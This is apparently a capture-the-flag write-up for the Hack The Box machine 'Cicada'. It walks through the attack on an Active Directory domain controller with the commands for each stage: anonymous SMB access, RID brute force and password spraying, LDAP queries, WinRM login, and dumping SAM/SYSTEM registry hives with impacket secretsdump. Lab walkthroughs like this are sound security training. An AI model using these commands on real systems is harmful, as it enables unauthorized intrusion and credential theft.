HTB-CICADA

HTB-CICADA

Great machine to clarify basic loading in enumeration and clear up misconfigurations in common windows services.

Released on 28 Sep 2024 Created by theblxckcicada

Enumeration - NMAP Portscan

NMAP -p- -sV <IP>

PORT STATE SERVICE VERSION

53/tcp open domain Simple DNS Plus

88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-18 02:28:03Z)

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)

445/tcp open microsoft-ds?

464/tcp open kpasswd5?

593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0

636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)

3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)

3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration - SMB

smbclient -L //<IP>

we will Figure out that we can access /HR without further permission

smbclient -L //<IP>/HR -SMB2

wich basically leads to a .txt file with usefull content.

Now that we captured a Password the easy way, we have to get some users to use it with..

Enumeration - RID-Brute Force

crackmapexec smb <IP> -u guest -p '' --rid-brute

By Password Spray you will figure out that you can use "michael.wrightson" as a user to enumerate further with.

Enumeration - LDAP

ldapsearch -x -H ldap://<IP> -D "Cicada\\michael.wrightson" -w '<password>' -b "DC=cicada,DC=htb" "(objectClass=user)"

Inside the LDAP Results we will find information about David Orelious, who dared to implement his Password in the Deskription.

Enumeration RPC

rpcclient -U CICADA.htb\michael.wrightson <IP>

enumdomusers

enumdomgroups

Enumeration SMB Part II

crackmapexec smb <IP> -u david.orelious -p '<Password>' --shares

crackmapexec smb <IP> -u david.orelious -p '<password>' --groups

We should take a look inside the new gained access folders..

and also keep in mind that they are some interesting permissions going on..

smbclient //<IP>/dev -U CICADA\\david.orelious

we will find some hardcoded credentials of our dear emily here..

User FLAG

smbclient //<IP>/C$ -U CICADA\\emily.oscars

Privilege Escalation

evil-winrm -i <IP> -u emilly.oscars -p '<password>'

whoami /all

reg save hklm\sam c:\temp\sam

reg save hklm\system c:\temp\system

download sam

download system

Use the tool of your choice to dump the secrets now.. in my case i used the "impacket" toolset

secretsdump.py -sam sam -system system LOCAL

Root FLAG

Afterwards just Win-rm to the target machine and obtain the root.txt flag.

NextHTB-CHEMISTRY (WIP)

Last updated